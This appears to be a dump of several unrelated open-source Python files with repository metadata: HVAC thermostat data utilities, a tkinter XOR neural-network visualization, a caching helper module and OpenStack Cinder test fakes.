except:
print("ERROR: No config file for building %s with path %s" % (building, config_path))
return
return cfg
def get_zone_config(building, zone):
config_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + "ZoneConfigs/" + zone + ".yml"
try:
with open(config_path, "r") as f:
cfg = yaml.load(f)
except:
print("ERROR: No config file for building %s and zone % s with path %s" % (building, zone, config_path))
return
return cfg
def get_zone_log(building, zone):
log_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + "Logs/" + zone + ".log"
## fix for logs that were written as one line
try:
f = open(log_path, "r")
log = f.read()
log = string.replace(log, "UTCTHERMOSTAT", "UTC\nTHERMOSTAT")
f.close()
f = open(log_path, 'w')
f.write(log)
f.close()
except:
print("ERROR: No config file for building %s and zone % s with path %s" % (building, zone, log_path))
return
## end of fix DELETE THIS WHEN ALL LOGS ARE FIXED!
try:
with open(log_path, "r") as f:
### fix for same line logs ###
log = f.readlines()
except:
print("ERROR: No config file for building %s and zone % s with path %s" % (building, zone, log_path))
return
return log
# Maybe put in ThermalDataManager because of circular import.
def get_data(building=None, client=None, cfg=None, start=None, end=None, days_back=50, evaluate_preprocess=False,
force_reload=False):
"""
Get preprocessed data.
:param building: (str) building name
:param cfg: (dictionary) config file for building. If none, the method will try to find it.
:param days_back: how many days back from current moment.
:param evaluate_preprocess: (Boolean) should controller data manager add more features to data.
:param force_reload: (boolean) If data for this building is already stored on disk, reuse it unless
force_reload is set. Otherwise, load data as specified.
:param start: the start time for the data. If none is given, we will use days_back to go back from the
end datetime if given (end - days_back), or the current time.
:param end: the end time for the data. If given, we will use it as our end. If not given, we will use the current
time as the end.
:return: {zone: pd.df with columns according to evaluate_preprocess}
"""
assert cfg is not None or building is not None
if cfg is not None:
building = cfg["Building"]
else:
cfg = get_config(building)
print("----- Get data for Building: %s -----" % building)
if evaluate_preprocess:
path = SERVER_DIR_PATH + "/Thermal_Data/" + building + "_eval"
else:
path = SERVER_DIR_PATH + "/Thermal_Data/" + building
if end is None:
end = get_utc_now()
if start is None:
start = end - datetime.timedelta(days=days_back)
# TODO ugly try/except
try:
assert not force_reload
print(path)
with open(path, "r") as f:
import pickle
thermal_data = pickle.load(f)
except:
if client is None:
client = choose_client(cfg)
dataManager = ThermalDataManager.ThermalDataManager(cfg, client)
thermal_data = dataManager.thermal_data(start=start, end=end, evaluate_preprocess=evaluate_preprocess)
with open(path, "wb") as f:
import pickle
pickle.dump(thermal_data, f)
return thermal_data
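# Illustrative call sketch (building name and horizon are placeholder assumptions):
# cfg = get_config("some-building")
# thermal_data = get_data(cfg=cfg, days_back=30, evaluate_preprocess=False)
# for zone, zone_df in thermal_data.items():
#     print(zone, zone_df.shape)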
def get_raw_data(building=None, client=None, cfg=None, start=None, end=None, days_back=50, force_reload=False):
assert cfg is not None or building is not None
if cfg is not None:
building = cfg["Building"]
else:
config_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + building + ".yml"
try:
with open(config_path, "r") as f:
cfg = yaml.load(f)
except:
print("ERROR: No config file for building %s with path %s" % (building, config_path))
return
print("----- Get data for Building: %s -----" % building)
path = SERVER_DIR_PATH + "/Thermal_Data/" + building
# TODO ugly try/except
if end is None:
end = get_utc_now()
if start is None:
start = end - datetime.timedelta(days=days_back)
# inside and outside data
import pickle
try:
assert not force_reload
with open(path + "_inside", "r") as f:
inside_data = pickle.load(f)
with open(path + "_outside", "r") as f:
outside_data = pickle.load(f)
except:
if client is None:
client = get_client()
dataManager = ThermalDataManager.ThermalDataManager(cfg, client)
inside_data = dataManager._get_inside_data(start, end)
outside_data = dataManager._get_outside_data(start, end)
with open(path + "_inside", "wb") as f:
pickle.dump(inside_data, f)
with open(path + "_outside", "wb") as f:
pickle.dump(outside_data, f)
return inside_data, outside_data
def get_mdal_data(mdal_client, query):
"""Gets mdal data. Necessary method because if a too long time frame is queried, mdal does not return the data.
:param mdal_client: mdal object to query data.
:param query: mdal query
:return pd.df with composition as columns. Timeseries in UTC time."""
start = get_mdal_string_to_datetime(query["Time"]["T0"])
end = get_mdal_string_to_datetime(query["Time"]["T1"])
time_frame = end - start
# get windowsize
str_window = query["Time"]["WindowSize"]
assert str_window[-3:] == "min"
WINDOW_SIZE = datetime.timedelta(minutes=int(str_window[:-3]))
if time_frame < WINDOW_SIZE:
raise Exception("WindowSize is less than the time interval for which data is requested.")
# To get logarithmic runtime we take splits which are powers of two.
max_interval = datetime.timedelta(hours=12) # the maximum interval length in which to split the data.
max_num_splits = int(time_frame.total_seconds() // max_interval.total_seconds())
all_splits = [1]
for _ in range(2, max_num_splits):
power_split = all_splits[-1] * 2
if power_split > max_num_splits:
break
all_splits.append(power_split)
received_all_data = False
outside_data = []
# start loop to get data in time intervals of logarithmically decreasing size. This will hopefully find the
# spot at which mdal returns data.
for num_splits in all_splits:
outside_data = []
pre_look_ahead = time_frame / num_splits
# to round down to nearest window size multiple
num_window_in_pre_look = pre_look_ahead.total_seconds() // WINDOW_SIZE.total_seconds()
look_ahead = datetime.timedelta(seconds=WINDOW_SIZE.total_seconds() * num_window_in_pre_look)
print("Attempting to get data in %f day intervals." % (look_ahead.total_seconds() / (60 * 60 * 24)))
temp_start = start
temp_end = temp_start + look_ahead
while temp_end <= end:
query["Time"]["T0"] = get_mdal_datetime_to_string(temp_start)
query["Time"]["T1"] = get_mdal_datetime_to_string(temp_end)
mdal_outside_data = mdal_client.do_query(query, tz="UTC")
if mdal_outside_data == {}:
print("Attempt failed.")
received_all_data = False
break
else:
outside_data.append(mdal_outside_data["df"])
# advance temp_start and temp_end
temp_start = temp_end + WINDOW_SIZE
temp_end = temp_start + look_ahead
# get the rest of the data if look_ahead is not an exact multiple of the window size
if temp_start < end < temp_end:
temp_end = end
# To know that we received all data.
if end < temp_start:
received_all_data = True
# stop if we got the data
if received_all_data:
print("Succeeded.")
break
if not received_all_data:
raise Exception("WARNING: Unable to get data form MDAL.")
return pd.concat(outside_data)
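# Illustrative sketch of the interval-splitting sequence used above (assumed
# 10-day query window): splits are powers of two capped by the number of 12h
# chunks, so the per-request interval shrinks logarithmically until MDAL answers.
# time_frame = datetime.timedelta(days=10)
# max_num_splits = int(time_frame.total_seconds() // (12 * 3600))  # -> 20
# splits = [1]
# while splits[-1] * 2 <= max_num_splits:
#     splits.append(splits[-1] * 2)
# print(splits)  # -> [1, 2, 4, 8, 16]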
def concat_zone_data(thermal_data):
"""Concatinates all thermal data zone data into one big dataframe. Will sort by index. Get rid of all zone_temperature columns.
:param thermal_data: {zone: pd.df}
:return pd.df without zone_temperature columns"""
concat_data = pd.concat(thermal_data.values()).sort_index()
filter_columns = ["zone_temperature" not in col for col in concat_data.columns]
return concat_data[concat_data.columns[filter_columns]]
def as_pandas(result):
time = result[list(result.keys())[0]][:, 0]
df = pd.DataFrame(time, columns=['Time'])
df['Time'] = pd.to_datetime(df['Time'], unit='s')
for key in result:
df[key] = result[key][:, 1].tolist()
try:
df[key + " Var"] = result[key][:, 2].tolist()
except IndexError:
pass
df = df.set_index('Time')
return df
# ============ THERMOSTAT FUNCTIONS ============
def has_setpoint_changed(tstat, setpoint_data, zone, building):
"""
Checks if thermostats was manually changed and prints warning.
:param tstat: Tstat object we want to look at.
:param setpoint_data: dict which has keys {"heating_setpoint": bool, "cooling_setpoint": bool} and corresponds to
the setpoint written to the thermostat by MPC.
:param zone: Name of the zone to print correct messages.
:return: Bool. Whether tstat setpoints are equal to setpoints written to tstat.
"""
WARNING_MSG = "WARNING. %s has been manually changed in zone %s. Setpoint is at %s from expected %s. " \
"Setting override to False and intiatiating program stop."
flag_changed = False
if tstat.cooling_setpoint != setpoint_data["cooling_setpoint"]:
flag_changed = True
print(WARNING_MSG % ("cooling setpoint", zone, tstat.cooling_setpoint, setpoint_data["cooling_setpoint"]))
if tstat.heating_setpoint != setpoint_data["heating_setpoint"]:
flag_changed = True
print(WARNING_MSG % ("heating setpoint", zone, tstat.heating_setpoint, setpoint_data["heating_setpoint"]))
return flag_changed
def set_override_false(tstat):
tstat.write({"override": False})
def get_thermostats(client, hod, building):
"""Gets the thermostats for given building.
:param client: xbos client object
:param hod: hod client object
:param building: (string) building name
:return {zone: tstat object}"""
query = """SELECT ?uri ?zone FROM %s WHERE {
?tstat rdf:type/rdfs:subClassOf* brick:Thermostat .
?tstat bf:uri ?uri .
?tstat bf:controls/bf:feeds ?zone .
};"""
# Start of FIX for missing Brick query
query = """SELECT ?zone ?uri FROM %s WHERE {
?tstat rdf:type brick:Thermostat .
?tstat bf:controls ?RTU .
?RTU rdf:type brick:RTU .
?RTU bf:feeds ?zone.
?zone rdf:type brick:HVAC_Zone .
?tstat bf:uri ?uri.
};"""
# End of FIX - delete when Brick is fixed
building_query = query % building
tstat_query_data = hod.do_query(building_query)['Rows']
tstats = {tstat["?zone"]: Thermostat(client, tstat["?uri"]) for tstat in tstat_query_data}
return tstats
# ============ PLOTTING FUNCTIONS ============
def plotly_figure(G, path=None):
pos = graphviz_layout(G, prog='dot')
edge_trace = go.Scatter(
x=[],
y=[],
line=go.Line(width=0.5, color='#888'),
hoverinfo='none',
mode='lines')
my_annotations = []
for edge in G.edges():
x0, y0 = pos[edge[0]]
x1, y1 = pos[edge[1]]
edge_trace['x'] += [x0, x1, None]
edge_trace['y'] += [y0, y1, None]
my_annotations.append(
dict(
x=(x0 + x1) / 2,
y=(y0 + y1) / 2,
xref='x',
yref='y',
text="" + G.get_edge_data(edge[0], edge[1])['action'] +
G.get_edge_data(edge[0], edge[1])['model_type'][0][0],
# TODO for multigraph use [0] to get the first edge. Also, only using the first letter to identify the model.
showarrow=False,
arrowhead=2,
ax=0,
ay=0
)
)
node_trace = go.Scatter(
x=[],
y=[],
text=[],
mode='markers',
hoverinfo='text',
marker=go.Marker(
showscale=False,
# colorscale options
# 'Greys' | 'Greens' | 'Bluered' | 'Hot' | 'Picnic' | 'Portland' |
# Jet' | 'RdBu' | 'Blackbody' | 'Earth' | 'Electric' | 'YIOrRd' | 'YIGnBu'
colorscale='YIGnBu',
reversescale=True,
color=[],
size=10,
colorbar=dict(
thickness=15,
title='Node Connections',
xanchor='left',
titleside='right'
),
line=dict(width=2)))
for node in G.nodes():
x, y = pos[node]
node_trace['x'].append(x)
node_trace['y'].append(y)
node_info = "Time: +{0}<br>Temps: {1}<br>Usage Cost: {2}".format(node.time,
node.temps,
G.node[node]['usage_cost'])
node_trace['text'].append(node_info)
if path is None:
node_trace['marker']['color'].append(G.node[node]['usage_cost'])
elif node in path:
node_trace['marker']['color'].append('rgba(255, 0, 0, 1)')
else:
node_trace['marker']['color'].append('rgba(0, 0, 255, 1)')
fig = go.Figure(data=go.Data([edge_trace, node_trace]),
layout=go.Layout(
title='<br>Network graph made with Python',
titlefont=dict(size=16),
showlegend=False,
width=650,
height=650,
hovermode='closest',
margin=dict(b=20, l=5, r=5, t=40),
annotations=my_annotations,
xaxis=go.XAxis(showgrid=False, zeroline=False, showticklabels=False),
yaxis=go.YAxis(showgrid=False, zeroline=False, showticklabels=False)))
return fig
# ========= Multithreading ========
class Barrier:
"""Class which behaves like python3's Barrier class.
NOTE: Never change any of the internal logic or set variables after they were set in the init."""
def __init__(self, num_threads):
import threading
self.num_threads = num_threads
self.count = 0
self.mutex = threading.Semaphore(1)
self.barrier = threading.Semaphore(0)
self.is_set = True
def wait(self):
"""Behaves like wait function from Barrier class. Make all threads wait together and then release them."""
self.mutex.acquire()
if not self.is_set:
self.reset()
self.mutex.release()
# increment counter by one to indicate that another thread is waiting now.
self.mutex.acquire()
self.count = self.count + 1
self.mutex.release()
# check if enough threads are waiting. If enough are waiting, the barrier will be opened
if self.count == self.num_threads:
self.barrier.release()
# if not enough threads are waiting, make the thread wait for the barrier to be released in the if statement.
self.barrier.acquire()
# release the barrier so other threads can use it
self.barrier.release()
# we set the flag to false. However, this should be fine since every thread should already be past
# the if statement that checks whether the Barrier is_set.
self.mutex.acquire()
if self.is_set:
self.is_set = False
self.mutex.release()
def reset(self):
"""Resets the barrier class."""
self.count = 0
self.barrier.acquire()
self.is_set = True
if __name__ == "__main__":
# bldg = "csu-dominguez-hills"
# inside, outside = get_raw_data(building=bldg, days_back=20, force_reload=True)
# use_data = {}
# for zone, zone_data in inside.items():
# if zone != "HVAC_Zone_Please_Delete_Me":
# use_data[zone] = zone_data
# print(zone)
# print(zone_data[zone_data["action"] == 2].shape)
# print(zone_data[zone_data["action"] == 5].shape)
#
# t_man = ThermalDataManager.ThermalDataManager({"Building": bldg}, client=get_client())
# outside = t_man._preprocess_outside_data(outside.values())
# print("inside")
# th_data = t_man._preprocess_thermal_data(use_data, outside, True)
#
# import pickle
# with open("u_p", "r") as f:
# th = pickle.load(f)
#
# zone = "HVAC_Zone_SAC_2101"
# zone_data = th[zone]
# print(zone_data[zone_data["action"] == 5].shape)
# print(zone_data[zone_data["action"] == 2].shape)
test_barrier = True
if test_barrier:
barrier = Barrier(2)
import time
import threading
def func1():
time.sleep(3)
#
barrier.wait()
#
print('Working from func1')
return
def func2():
time.sleep(5)
#
barrier.wait()
#
print('Working from func2')
return
threading.Thread(target=func1).start()
threading.Thread(target=func2).start()
time.sleep(6)
# check if reset
threading.Thread(target=func1).start()
threading.Thread(target=func2).start()
| 35.057225
| 131
| 0.599674
|
6e5cf966d85759af33becbcccfecc7f0866697b8
| 2,297
|
py
|
Python
|
Implementation_NN/3_nn_XOR_gate_visualization.py
|
bikashsingh0/neural_network_scratch
|
c5db50e75dc0216f9b5bed0f2e48f51e2e370bde
|
[
"MIT"
] | 1
|
2019-07-04T05:54:00.000Z
|
2019-07-04T05:54:00.000Z
|
Implementation_NN/3_nn_XOR_gate_visualization.py
|
bikashsingh0/neural_network_scratch
|
c5db50e75dc0216f9b5bed0f2e48f51e2e370bde
|
[
"MIT"
] | null | null | null |
Implementation_NN/3_nn_XOR_gate_visualization.py
|
bikashsingh0/neural_network_scratch
|
c5db50e75dc0216f9b5bed0f2e48f51e2e370bde
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import sys
import random
import numpy as np
sys.path.append('..')
from neural_network import NeuralNetwork
import time
from tkinter import *
tk = Tk()
widthSize = 500
heightSize = 500
frameRate = 60
frameSpeed = int(1 / frameRate * 1000)
canvas = Canvas(tk, width=widthSize, height=heightSize, background="black")
tk.title("Drawing_float")
canvas.pack()
inputLen = 2
hiddenLen = 3
outputLen = 1
learningRate = 0.1
n = NeuralNetwork(inputLen, hiddenLen, outputLen)
# with the smaller 2-2-1 structure below, the network may sometimes fail to learn XOR
# n = NeuralNetwork(2, 2, 1)
training_data = {
1: {'inputs': np.array([[0],[0]]), 'targets': np.array([[0]])},
2: {'inputs': np.array([[0],[1]]), 'targets': np.array([[1]])},
3: {'inputs': np.array([[1],[0]]), 'targets': np.array([[1]])},
4: {'inputs': np.array([[1],[1]]), 'targets': np.array([[0]])},
}
def training():
x = random.choice(list(training_data.values()))
inputs = x.get('inputs')
targets = x.get('targets')
n.trainSVLearing(inputs,targets,learningRate)
while True:
for i in range(2000):
training()
resolution = 10
cols = widthSize/resolution
rows = heightSize/resolution
for i in range(int(cols)):
for j in range(int(rows)):
x1 = i/cols
x2 = j/rows
inputs = np.array([[x1],[x2]])
print ("Inputs = "+ str(inputs))
y = n.feedForward(inputs)
print ("Output = "+ str(y))
output = y
# print("Value of y is = " + str(output))
color = int(output * 255)
# print("Value of color is = " + str(color))
hexColor = format(color, '02x')
# print("Value of hex is = " + str(hexColor))
finalColor = "#" + hexColor + hexColor + hexColor
print("finalColor = " + str(finalColor))
# rect = canvas.create_rectangle(i*resolution, j*resolution, (i+1)*resolution, (j+1)*resolution, outline='red')
rect = canvas.create_rectangle(i*resolution, j*resolution, (i+1)*resolution, (j+1)*resolution)
# canvas.itemconfig(rect, fill="#ff00ff")
canvas.itemconfig(rect, fill=finalColor)
tk.after(frameSpeed, tk.update()) # for every give time updates frame
tk.mainloop()
| 29.831169
| 123
| 0.594689
|
24d99a7ff3efffe5d3e4927117078f1d35e3d087
| 24
|
py
|
Python
|
splunk_sdk/__version__.py
|
ahallur/splunk-cloud-sdk-python
|
27914e4cb624bcc67788408688553cfb99f64aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
splunk_sdk/__version__.py
|
ahallur/splunk-cloud-sdk-python
|
27914e4cb624bcc67788408688553cfb99f64aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
splunk_sdk/__version__.py
|
ahallur/splunk-cloud-sdk-python
|
27914e4cb624bcc67788408688553cfb99f64aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
__version__ = '1.0.0b4'
| 12
| 23
| 0.666667
|
1df50163d986d9a7745847149100d8e31050f894
| 265
|
py
|
Python
|
chandler/run.py
|
jenlaiwong/ColorNets
|
6b976f0b3e09ab7478691d9cc8d37b35d2885175
|
[
"MIT"
] | null | null | null |
chandler/run.py
|
jenlaiwong/ColorNets
|
6b976f0b3e09ab7478691d9cc8d37b35d2885175
|
[
"MIT"
] | null | null | null |
chandler/run.py
|
jenlaiwong/ColorNets
|
6b976f0b3e09ab7478691d9cc8d37b35d2885175
|
[
"MIT"
] | null | null | null |
import pickle
import numpy as np
#### Setup
# read W1 W2 history if it exists, otherwise pick random and write
# read x and y from inputs and write them to files
# weight_history (append only)
# (read only)
# [Xy1, Xy2, ..]
# thread concurrent
# run multi processes
| 14.722222
| 66
| 0.728302
|
8d022e2ab3b59eb45a360c5573f74da1e0051beb
| 3,962
|
py
|
Python
|
ion/cache.py
|
bamaxw/ion
|
a04b7d6b05cc606e821d52bbdbb7fe080742134f
|
[
"MIT"
] | 1
|
2019-04-29T15:13:33.000Z
|
2019-04-29T15:13:33.000Z
|
ion/cache.py
|
bamaxw/ion
|
a04b7d6b05cc606e821d52bbdbb7fe080742134f
|
[
"MIT"
] | null | null | null |
ion/cache.py
|
bamaxw/ion
|
a04b7d6b05cc606e821d52bbdbb7fe080742134f
|
[
"MIT"
] | null | null | null |
'''Functions and classes helping with application-level caching and memoization'''
from typing import Callable, Any, Optional
from functools import wraps, partial
from collections import namedtuple
import time
TsValue = namedtuple('TsValue', ['value', 'timestamp'])
class MemoizeWithTimeout:
'''
Use this class to memoize a functions result for a certain period of time
Class attributes:
- _per_func_cache: stores a function result in a dictionary where
key is tuple(args, tuple(sorted(kwargs.items()))) tuple, and
value is TsValue with value being return value and ts being timestamp when it happened
- _timeouts: stores timeout value for each of registered functions
'''
_per_func_cache = {}
_timeouts = {}
def __init__(self, timeout: int = 60):
self.timeout = float(timeout)
def collect(self) -> None:
"""Clear cache of results which have timed out"""
for func, func_cache in self._per_func_cache.items():
cache = {}
for args_kwargs, cached in func_cache.items():
if (time.time() - cached.timestamp) < self._timeouts[func]:
cache[args_kwargs] = cached
self._per_func_cache[func] = cache
def __call__(self, func):
cache = self._per_func_cache[func] = {}
self._timeouts[func] = self.timeout
@wraps(func)
def _wrapper(*args, **kwargs):
args_kwargs = (args, tuple(sorted(kwargs.items())))
try:
cached = cache[args_kwargs]
if (time.time() - cached.timestamp) > self.timeout:
raise KeyError
except KeyError:
return_value = func(*args, **kwargs)
cached = cache[args_kwargs] = TsValue(
value=return_value,
timestamp=time.time()
)
return cached.value
return _wrapper
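# Illustrative usage sketch (not part of the original module); the decorated
# function and expensive_remote_call are assumptions for this example only.
# @MemoizeWithTimeout(timeout=5)
# def slow_lookup(key):
#     return expensive_remote_call(key)  # hypothetical helper
# slow_lookup("a")   # computed and cached with a timestamp
# slow_lookup("a")   # served from cache for up to 5 seconds
# time.sleep(6)
# slow_lookup("a")   # entry timed out, recomputed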
def create_minute_memoize(no_minutes: float):
'''Creates MemoizeWithTimeout with timeout equal no_minutes minutes'''
return MemoizeWithTimeout(no_minutes * 60)
minute_memoize = MemoizeWithTimeout(60)
cache_for = create_minute_memoize
memoize_for = create_minute_memoize
_remember_cache = {}
def remember(func):
@wraps(func)
def _wrap(*a, **kw):
if str(type(func)) in ("<class 'function'>", "<class 'builtin_function_or_method'>"):
obj = None
elif str(type(func)) == "<class 'method'>":
obj = a[0]
if obj not in _remember_cache:
_remember_cache[obj] = {}
if func not in _remember_cache[obj]:
_remember_cache[obj][func] = func(*a, **kw)
return _remember_cache[obj][func]
return _wrap
def _from_cache_on_err(func: Callable, *, default: Any):
'''
Caches a function response, so that if the function is called
in the future and results in an error, the cached response is returned
If the first function call results in an error, the error is re-raised
Assumed use-case is reading remote data, so that if the remote server goes down
the previously read version of the data will be returned as a fallback
'''
_cached = default
@wraps(func)
def _wrap(*a, **kw):
# remember the latest successful result so it can be returned if a later call fails
nonlocal _cached
try:
_cached = func(*a, **kw)
return _cached
except:  # pylint: disable=bare-except
if _cached is default:
raise
return _cached
return _wrap
def from_cache_on_err(
func: Optional[Callable] = None,
default: Any = ...
):
'''
Wrapper around _from_cache_on_err allows for the from_cache_on_err to be called
with additional argument *default* that initializes cache with data that is impossible
to be returned from the function itself
'''
if func:
return _from_cache_on_err(func, default=default)
return partial(_from_cache_on_err, default=default)
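# Illustrative usage sketch (assumed remote reader, not part of the original module):
# @from_cache_on_err
# def read_remote_config():
#     return fetch_from_server()  # hypothetical remote call
# cfg = read_remote_config()  # first call must succeed, otherwise the error is re-raised
# cfg = read_remote_config()  # if the server is down now, the last good value is returned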
| 36.018182
| 116
| 0.626704
|
0052373d155a064be733051034f056b081f27b0b
| 9,550
|
py
|
Python
|
cinder/tests/unit/api/v2/fakes.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/unit/api/v2/fakes.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | 2
|
2018-10-25T13:04:01.000Z
|
2019-08-17T13:15:24.000Z
|
cinder/tests/unit/api/v2/fakes.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | 2
|
2018-10-17T13:32:50.000Z
|
2018-11-08T08:39:39.000Z
|
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import iso8601
from cinder import exception as exc
from cinder import objects
from cinder.objects import fields
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_volume
from cinder import utils
DEFAULT_VOL_NAME = "displayname"
DEFAULT_VOL_DESCRIPTION = "displaydesc"
DEFAULT_VOL_SIZE = 1
DEFAULT_VOL_TYPE = "vol_type_name"
DEFAULT_VOL_STATUS = "fakestatus"
DEFAULT_VOL_ID = fake.VOLUME_ID
# TODO(vbala): api.v1 tests use hard-coded "fakeaz" for verifying
# post-conditions. Update value to "zone1:host1" once we remove
# api.v1 tests and use it in api.v2 tests.
DEFAULT_AZ = "fakeaz"
def create_fake_volume(id, **kwargs):
volume = {
'id': id,
'user_id': fake.USER_ID,
'project_id': fake.PROJECT_ID,
'host': 'fakehost',
'size': DEFAULT_VOL_SIZE,
'availability_zone': DEFAULT_AZ,
'status': DEFAULT_VOL_STATUS,
'migration_status': None,
'attach_status': fields.VolumeAttachStatus.ATTACHED,
'name': 'vol name',
'display_name': DEFAULT_VOL_NAME,
'display_description': DEFAULT_VOL_DESCRIPTION,
'updated_at': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.iso8601.Utc()),
'created_at': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.iso8601.Utc()),
'snapshot_id': None,
'source_volid': None,
'volume_type_id': '3e196c20-3c06-11e2-81c1-0800200c9a66',
'encryption_key_id': None,
'volume_admin_metadata': [{'key': 'attached_mode', 'value': 'rw'},
{'key': 'readonly', 'value': 'False'}],
'bootable': False,
'launched_at': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.iso8601.Utc()),
'volume_type': fake_volume.fake_db_volume_type(name=DEFAULT_VOL_TYPE),
'replication_status': 'disabled',
'replication_extended_status': None,
'replication_driver_data': None,
'volume_attachment': [],
'multiattach': False,
}
volume.update(kwargs)
if kwargs.get('volume_glance_metadata', None):
volume['bootable'] = True
if kwargs.get('attach_status') == fields.VolumeAttachStatus.DETACHED:
del volume['volume_admin_metadata'][0]
return volume
def fake_volume_create(self, context, size, name, description, snapshot=None,
**param):
vol = create_fake_volume(DEFAULT_VOL_ID)
vol['size'] = size
vol['display_name'] = name
vol['display_description'] = description
source_volume = param.get('source_volume') or {}
vol['source_volid'] = source_volume.get('id')
vol['bootable'] = False
vol['volume_attachment'] = []
vol['multiattach'] = utils.get_bool_param('multiattach', param)
try:
vol['snapshot_id'] = snapshot['id']
except (KeyError, TypeError):
vol['snapshot_id'] = None
vol['availability_zone'] = param.get('availability_zone', 'fakeaz')
return vol
def fake_volume_api_create(self, context, *args, **kwargs):
vol = fake_volume_create(self, context, *args, **kwargs)
return fake_volume.fake_volume_obj(context, **vol)
def fake_image_service_detail(self, context, **kwargs):
filters = kwargs.get('filters', {'name': ''})
if filters['name'] == "Fedora-x86_64-20-20140618-sda":
return [{'id': "c905cedb-7281-47e4-8a62-f26bc5fc4c77"}]
elif filters['name'] == "multi":
return [{'id': "c905cedb-7281-47e4-8a62-f26bc5fc4c77"},
{'id': "c905cedb-abcd-47e4-8a62-f26bc5fc4c77"}]
return []
def fake_volume_create_from_image(self, context, size, name, description,
snapshot, volume_type, metadata,
availability_zone):
vol = create_fake_volume(fake.VOLUME_ID)
vol['status'] = 'creating'
vol['size'] = size
vol['display_name'] = name
vol['display_description'] = description
vol['availability_zone'] = 'cinder'
vol['bootable'] = False
return vol
def fake_volume_update(self, context, *args, **param):
pass
def fake_volume_delete(self, context, *args, **param):
pass
def fake_volume_get(self, context, volume_id, viewable_admin_meta=False):
if viewable_admin_meta:
return create_fake_volume(volume_id)
else:
volume = create_fake_volume(volume_id)
del volume['volume_admin_metadata']
return volume
def fake_volume_get_notfound(self, context,
volume_id, viewable_admin_meta=False):
raise exc.VolumeNotFound(volume_id)
def fake_volume_get_db(context, volume_id):
if context.is_admin:
return create_fake_volume(volume_id)
else:
volume = create_fake_volume(volume_id)
del volume['volume_admin_metadata']
return volume
def fake_volume_api_get(self, context, volume_id, viewable_admin_meta=False):
vol = create_fake_volume(volume_id)
return fake_volume.fake_volume_obj(context, **vol)
def fake_volume_get_all(context, search_opts=None, marker=None, limit=None,
sort_keys=None, sort_dirs=None, filters=None,
viewable_admin_meta=False, offset=None):
return [create_fake_volume(fake.VOLUME_ID, project_id=fake.PROJECT_ID),
create_fake_volume(fake.VOLUME2_ID, project_id=fake.PROJECT2_ID),
create_fake_volume(fake.VOLUME3_ID, project_id=fake.PROJECT3_ID)]
def fake_volume_get_all_by_project(self, context, marker, limit,
sort_keys=None, sort_dirs=None,
filters=None,
viewable_admin_meta=False, offset=None):
return [fake_volume_get(self, context, fake.VOLUME_ID,
viewable_admin_meta=True)]
def fake_volume_api_get_all_by_project(self, context, marker, limit,
sort_keys=None, sort_dirs=None,
filters=None,
viewable_admin_meta=False,
offset=None):
vol = fake_volume_get(self, context, fake.VOLUME_ID,
viewable_admin_meta=viewable_admin_meta)
vol_obj = fake_volume.fake_volume_obj(context, **vol)
return objects.VolumeList(objects=[vol_obj])
def fake_snapshot(id, **kwargs):
snapshot = {'id': id,
'volume_id': fake.VOLUME_ID,
'status': fields.SnapshotStatus.AVAILABLE,
'volume_size': 100,
'created_at': None,
'display_name': 'Default name',
'display_description': 'Default description',
'project_id': fake.PROJECT_ID,
'snapshot_metadata': []}
snapshot.update(kwargs)
return snapshot
def fake_snapshot_get_all(context, filters=None, marker=None, limit=None,
sort_keys=None, sort_dirs=None, offset=None):
return [fake_snapshot(fake.VOLUME_ID, project_id=fake.PROJECT_ID),
fake_snapshot(fake.VOLUME2_ID, project_id=fake.PROJECT2_ID),
fake_snapshot(fake.VOLUME3_ID, project_id=fake.PROJECT3_ID)]
def fake_snapshot_get_all_by_project(context, project_id, filters=None,
marker=None, limit=None, sort_keys=None,
sort_dirs=None, offset=None):
return [fake_snapshot(fake.SNAPSHOT_ID)]
def fake_snapshot_update(self, context, *args, **param):
pass
def fake_service_get_all(*args, **kwargs):
return [{'availability_zone': "zone1:host1", "disabled": 0}]
def fake_service_get_all_by_topic(context, topic, disabled=None):
return [{'availability_zone': "zone1:host1", "disabled": 0}]
def fake_snapshot_get(self, context, snapshot_id):
if snapshot_id == fake.WILL_NOT_BE_FOUND_ID:
raise exc.SnapshotNotFound(snapshot_id=snapshot_id)
return fake_snapshot(snapshot_id)
def fake_consistencygroup_get_notfound(self, context, cg_id):
raise exc.GroupNotFound(group_id=cg_id)
def fake_volume_type_get(context, id, *args, **kwargs):
return {'id': id,
'name': 'vol_type_name',
'description': 'A fake volume type',
'is_public': True,
'projects': [],
'extra_specs': {},
'created_at': None,
'deleted_at': None,
'updated_at': None,
'qos_specs_id': fake.QOS_SPEC_ID,
'deleted': False}
def fake_volume_admin_metadata_get(context, volume_id, **kwargs):
admin_meta = {'attached_mode': 'rw', 'readonly': 'False'}
if kwargs.get('attach_status') == fields.VolumeAttachStatus.DETACHED:
del admin_meta['attached_mode']
return admin_meta
| 36.174242
| 78
| 0.638953
|
9da38c6aaaf52bf08d090cd5a6861aa0013d608e
| 4,907
|
py
|
Python
|
python/mxnet/rtc.py
|
Najah-lshanableh/Deep_learning
|
4b8235bdacd319843dda7b331f207808e4a90a93
|
[
"Apache-2.0"
] | 4
|
